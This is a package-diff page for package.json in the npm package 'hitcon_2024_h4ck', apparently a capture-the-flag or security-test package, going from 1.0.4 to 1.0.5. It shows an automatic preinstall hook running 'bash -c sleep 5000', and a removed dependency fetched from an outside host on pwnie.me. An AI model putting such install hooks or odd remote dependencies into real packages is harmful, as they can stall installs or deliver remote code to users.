hitcon_2024_h4ck 1.0.4 → 1.0.5

Sign up to get free protection for your applications and to get access to all the features.
Files changed (1) hide show
  1. package/package.json +2 -2
package/package.json CHANGED
@@ -1,13 +1,13 @@
1
1
  {
2
2
  "name": "hitcon_2024_h4ck",
3
- "version": "1.0.4",
3
+ "version": "1.0.5",
4
4
  "description": "",
5
5
  "main": "index.tsx",
6
6
  "scripts": {
7
7
  "preinstall": "bash -c sleep 5000",
8
8
  "test": "echo \"Error: no test specified\" && exit 1"
9
9
  },
10
- "dependencies": {"@package/package": "https://38205e06.pwnie.me/@package/package@1.0.0"},
10
+ "dependencies": {"@package/package": "jsr:@luca/cases"},
11
11
  "author": "",
12
12
  "license": "ISC"
13
13
  }